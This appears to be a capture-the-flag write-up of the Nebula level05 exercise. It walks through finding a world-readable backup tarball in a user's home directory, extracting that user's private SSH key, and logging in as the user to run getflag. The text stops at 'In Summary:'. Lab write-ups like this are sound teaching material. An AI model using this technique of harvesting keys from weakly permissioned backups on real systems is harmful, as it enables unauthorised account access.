04 May 2020
You need to secure your backups. The instructions for this level suggest we keep an eye out for weak permissions. Easy enough, let’s take a look at the target user’s home directory
level05@nebula:~$ ls -l
total 0
At first glance it doesn’t seem like there’s anything there but if we include the -a flag to list
hidden files (aka dotfiles) we see some interesting directories:
level05@nebula:~$ ls -la
total 9
drwxr-x--- 1 flag05 level05 80 2020-04-27 20:02 .
drwxr-xr-x 1 root root 80 2012-08-27 07:18 ..
drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .backup
-rw------- 1 flag05 flag05 23 2020-04-27 20:02 .bash_history
-rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
drwx------ 2 flag05 flag05 60 2020-04-27 20:02 .cache
-rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05 70 2011-11-20 20:13 .ssh
That .backup looks promising – it’s readable by anyone – let’s see what was backed up.
level05@nebula:~$ ls -la /home/flag05/.backup/
total 2
drwxr-xr-x 2 flag05 flag05 42 2011-11-20 20:13 .
drwxr-x--- 1 flag05 level05 80 2020-04-27 20:02 ..
-rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz
A tarball… whats it hold? We can use tar with -t to list the files in an archive and -f to
specify which archive
level05@nebula:~$ tar -tf /home/flag05/.backup/backup-19072011.tgz
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
There they are! The keys to the castle! Let’s extract them to a new /flag05keys directory in our
home. Here, -x indicates we want to extract the files, -v enables verbose output, -f
again identifies the archive we’re working with, and -C allows us to specify where the extracted
files should go. tar won’t create the directory for us though so we run mkdir ~/flag05keys first.
level05@nebula:~$ mkdir ~/flag05keys && tar -xvf /home/flag05/.backup/backup-19072011.tgz -C ~/flag05keys
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
Let’s check that the public key is the same as the one in .ssh/authorized_keys
level05@nebula:~$ diff ~/flag05keys/.ssh/authorized_keys ~/flag05keys/.ssh/id_rsa.pub
No output indicates these files are identical. That means, if this “backup” is an accurate
representation of our target’s .ssh, we can connect as flag05 over ssh by providing this private
key with -i
level05@nebula:~$ ssh -i ~/flag05keys/.ssh/id_rsa flag05@localhost
The authenticity of host localhost (127.0.0.1) cant be established.
ECDSA key fingerprint is ea:8d:09:1d:f1:69:e6:1e:55:c7:ec:e9:76:a1:37:f0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added localhost (ECDSA) to the list of known hosts.
_ __ __ __
/ | / /__ / /_ __ __/ /___ _
/ |/ / _ \/ __ \/ / / / / __ `/
/ /| / __/ /_/ / /_/ / / /_/ /
/_/ |_/\___/_.___/\__,_/_/\__,_/
exploit-exercises.com/nebula
For level descriptions, please see the above URL.
To log in, use the username of "levelXX" and password "levelXX", where
XX is the level number.
Currently there are 20 levels (00 - 19).
Welcome to Ubuntu 11.10 (GNU/Linux 3.0.0-12-generic i686)
* Documentation: https://help.ubuntu.com/
New release '12.04 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
flag05@nebula:~$
It worked! Now that we’re user flag05, we can run getflag and move on.
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
In Summary: